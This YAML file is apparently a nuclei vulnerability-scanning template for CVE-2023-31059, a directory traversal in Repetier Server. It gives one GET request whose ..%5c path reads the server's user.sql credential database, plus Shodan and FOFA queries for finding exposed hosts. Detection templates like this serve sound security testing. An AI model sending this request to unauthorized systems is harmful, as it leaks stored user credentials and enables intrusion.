nuclei-templates/http/cves/2023/CVE-2023-31059.yaml

46 lines
1.5 KiB
YAML

id: CVE-2023-31059
info:
name: Repetier Server - Directory Traversal
author: parthmalhotra,pdresearch
severity: high
description: |
Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Repetier Server.
reference:
- https://cybir.com/2023/cve/poc-repetier-server-140/
- https://www.repetier-server.com/download-repetier-server/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-31059
cwe-id: CWE-22
epss-score: 0.00393
epss-percentile: 0.7038
cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: repetier-server
product: repetier-server
shodan-query: title:"Repetier-Server"
fofa-query: title="Repetier-Server"
tags: cve,cve2023,repetier,lfi
http:
- method: GET
path:
- "{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"
matchers-condition: and
matchers:
- type: binary
part: body
binary:
- 53514C69746520666F726D6174203300
- type: status
status:
- 200